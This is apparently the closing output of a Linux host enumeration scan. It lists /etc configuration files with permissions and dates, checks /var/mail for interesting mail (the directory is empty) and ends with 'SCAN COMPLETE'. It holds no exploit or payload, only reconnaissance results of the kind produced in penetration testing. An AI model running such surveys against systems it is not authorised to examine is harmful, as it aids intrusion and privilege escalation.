-rw-r--r-- 1 root root 1320 Aug 19 2014 /etc/rsyslog.conf
-rw-r--r-- 1 root root 1260 Jul 1 2013 /etc/ucf.conf
-rw-r--r-- 1 root root 92 Feb 20 2014 /etc/host.conf
-rw-r--r-- 1 root root 4781 Nov 15 2013 /etc/hdparm.conf
-rw-r--r-- 1 root root 2584 Oct 10 2012 /etc/gai.conf
-rw-r--r-- 1 root root 350 May 28 22:00 /etc/popularity-contest.conf
-rw-r--r-- 1 root root 7788 May 28 22:00 /etc/ca-certificates.conf
-rw-r--r-- 1 root root 552 Feb 1 2014 /etc/pam.conf
-rw-r--r-- 1 root root 2084 Apr 1 2013 /etc/sysctl.conf
-rw-r--r-- 1 root root 956 Feb 19 2014 /etc/mke2fs.conf
-rw-r--r-- 1 root root 321 Jun 20 2013 /etc/updatedb.conf
-rw-r--r-- 1 root root 14867 May 10 2014 /etc/ltrace.conf
-rw-r--r-- 1 root root 604 Nov 7 2013 /etc/deluser.conf
-rw-r--r-- 1 root root 34 Aug 3 2016 /etc/ld.so.conf
-rw-r--r-- 1 root root 2969 Feb 23 2014 /etc/debconf.conf
-rw-r--r-- 1 root root 475 Feb 20 2014 /etc/nsswitch.conf
-rw-r--r-- 1 root root 2981 Aug 3 2016 /etc/adduser.conf
-rw-r----- 1 root fuse 280 May 24 2013 /etc/fuse.conf
-rw-r--r-- 1 root root 703 Jan 22 2014 /etc/logrotate.conf
-rw-r--r-- 1 root root 771 May 19 2013 /etc/insserv.conf


Any interesting mail in /var/mail:
total 8
drwxrwsr-x 2 root mail 4096 Aug 3 2016 .
drwxr-xr-x 14 root root 4096 May 29 18:41 ..


### SCAN COMPLETE ####################################